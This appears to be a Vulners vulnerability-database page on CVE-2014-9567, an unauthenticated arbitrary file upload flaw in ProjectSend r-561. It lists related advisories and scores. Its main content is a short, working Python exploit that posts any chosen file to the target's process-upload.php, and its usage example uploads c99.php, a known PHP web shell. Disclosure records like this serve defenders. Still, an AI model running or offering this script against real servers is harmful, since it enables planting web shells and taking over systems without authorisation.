ProjectSend r-561 - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2014-9567 | 31 Dec 201400:00 | – | circl | |
| ProjectSend Arbitrary File Upload Vulnerability | 15 Jan 201500:00 | – | cnvd | |
| CVE-2014-9567 | 7 Jan 201518:00 | – | cve | |
| CVE-2014-9567 | 7 Jan 201518:00 | – | cvelist | |
| ProjectSend - Arbitrary File Upload (Metasploit) | 31 Dec 201400:00 | – | exploitdb | |
| EUVD-2014-9381 | 7 Oct 202500:30 | – | euvd | |
| CVE-2014-9567 | 7 Jan 201518:59 | – | nvd | |
| Unrestricted file upload | 7 Jan 201518:59 | – | prion |
#!/usr/bin/python
# Exploit Title: ProjectSend r-651 File Upload
# Date: December 01, 2014
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
# Vendor Homepage: http://www.projectsend.org/
# Software Link: http://www.projectsend.org/download/67/
# Version: r-561
# Tested on: Kubuntu 14.10 x64
import sys
import requests
scriptName = sys.argv[0]
if (len(sys.argv) != 3):
print "Please enter the target path and the file to upload."
print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
quit()
print "Exploiting ProjectSend-r561 File Upload .."
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
print "Sending Url " + url
files = {'file': open(sys.argv[2], 'rb')}
r = requests.post(url, files=files)
print r.textData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.4334